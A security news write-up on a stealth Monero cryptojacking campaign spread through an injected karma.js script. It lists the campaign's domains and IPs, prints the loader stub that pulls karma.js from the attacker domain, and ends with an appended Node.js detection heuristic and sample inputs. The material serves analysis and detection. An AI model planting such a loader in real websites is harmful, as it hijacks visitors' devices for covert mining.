New Wave of Crypto-Hijacking Infects 3,500+ Websites
A stealth Monero-mining campaign has quietly compromised more than 3,500 websites by embedding an innocuous-looking JavaScript file called karma.js.
The operation leverages WebAssembly, Web Workers, and WebSockets to siphon CPU cycles while keeping resource usage low enough to avoid user suspicion.
Cside.dev analysts first noted the anomaly after routine crawlers flagged an obfuscated script delivered via trustisimportant.fun that immediately redirected to yobox.store.
The team observed no initial network calls or CPU spikes, yet heuristic analysis classified the payload as malicious, prompting a deeper teardown.
Unpacking the code revealed a command-and-control channel at wss://lokilokitwo.de:10006, hard-coded fallback IPs 89.58.14.251 and 104.21.80.1, and a penchant for recycling infrastructure previously linked to Magecart card-skimming crews.
By throttling hash intensity and distributing work across background threads, the miner maintains a near-invisible footprint even on mobile devices.
This marks a resurgence of browser-based cryptojacking, once thought defunct after Coinhive’s 2019 demise, but now refined to evade both ad-blocker blacklists and built-in browser mining defenses.
Victims experience only marginal latency, extending dwell time and cumulative profit for attackers.
(Image in the original article: the base64-encoded loader that starts the chain.)
Stealth Infection Mechanism
The infection begins with a single-line data URI injected into a legitimate page, often through compromised third-party widgets or outdated CMS plug-ins.
Once executed, the stub dynamically loads the real miner, assigns a random element ID to avoid duplication checks, and hooks an onload handler that launches the EverythingIsLife() bootstrap routine.
// Loader stub as described above: it bails out if an element with the given ID
// already exists, otherwise creates a <script> element pointing at karma.js and
// inserts it ahead of the first existing <script> on the page.
(function(d,s,id){
  if(d.getElementById(id)) return;          // duplication check keyed on the element ID
  const js=d.createElement(s);js.id=id;
  js.src="https://trustisimportant.fun/karma/karma.js?karma=bs";
  const first=d.getElementsByTagName(s)[0]; // first existing <script> element
  first.parentNode.insertBefore(js, first);
})(document,'script','backup-jss');
Inside karma.js, a capability probe tests navigator.hardwareConcurrency and WebAssembly before spawning several workers that fetch hashes via WebSocket and return results in near-real-time.
Capping CPU load at roughly 20% keeps the miner below the thresholds that would normally raise suspicion, so detection has to rely on runtime script-integrity monitoring rather than on resource-usage anomalies.
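The capability probe and loader pattern described above can be turned into a simple static check. The following is an added example, not code from the article or from the campaign: a Node.js heuristic that scores a script body on the miner primitives named here (hardwareConcurrency probe, WebAssembly, Workers, WebSocket, data-URI loader) and on the indicators quoted in the write-up, run over constructed sample inputs; the host c2.example.invalid and the sample snippets are invented for illustration.

```javascript
// Indicators quoted in the article above (domains and fallback IPs).
const KNOWN_IOCS = ['trustisimportant.fun', 'yobox.store', 'lokilokitwo.de',
                    '89.58.14.251', '104.21.80.1'];

// Primitives a throttled in-browser WASM miner needs, plus the data-URI loader trick.
const CAPABILITY_PATTERNS = {
  hardwareConcurrency: /navigator\.hardwareConcurrency/,
  webassembly: /WebAssembly\.(instantiate|compile|Module|Instance)/,
  worker: /new\s+Worker\s*\(/,
  websocket: /new\s+WebSocket\s*\(\s*['"`]wss?:\/\//,
  dataUriLoader: /data:(?:text|application)\/javascript;base64,/i,
};

// Returns { verdict, capabilities, iocs } for one script body.
function analyzeScript(text) {
  const capabilities = Object.entries(CAPABILITY_PATTERNS)
    .filter(([, re]) => re.test(text))
    .map(([name]) => name);
  const iocs = KNOWN_IOCS.filter((ioc) => text.includes(ioc));
  // Any known indicator is a confirmed hit; otherwise require the full miner set,
  // since a Worker or WebSocket on its own is ordinary web-app behaviour.
  const minerSet = ['hardwareConcurrency', 'webassembly', 'worker', 'websocket'];
  const hasMinerSet = minerSet.every((c) => capabilities.includes(c));
  let verdict = 'clean';
  if (iocs.length) verdict = 'known-campaign';
  else if (hasMinerSet) verdict = 'suspected-miner';
  else if (capabilities.length >= 2) verdict = 'review';
  return { verdict, capabilities, iocs };
}

// Constructed samples (not captured from any site).
const SAMPLE_LOADER = 'const js=d.createElement("script");' +
  'js.src="https://trustisimportant.fun/karma/karma.js";';
const SAMPLE_MINER = [
  'const n = navigator.hardwareConcurrency || 2;',
  'WebAssembly.instantiate(wasmBytes).then(() => {',
  '  for (let i = 0; i < n; i++) new Worker(workerUrl);',
  '});',
  'const ws = new WebSocket("wss://c2.example.invalid:10006");', // invented host
].join('\n');
const SAMPLE_BENIGN = 'const w = new Worker("/static/resize.js"); w.postMessage(img);';

for (const [name, body] of Object.entries({ SAMPLE_LOADER, SAMPLE_MINER, SAMPLE_BENIGN })) {
  console.log(name, analyzeScript(body));
}
```

The loader sample resolves as known-campaign on the domain alone, the miner sample on the full primitive set without any indicator, and the benign resize worker stays clean.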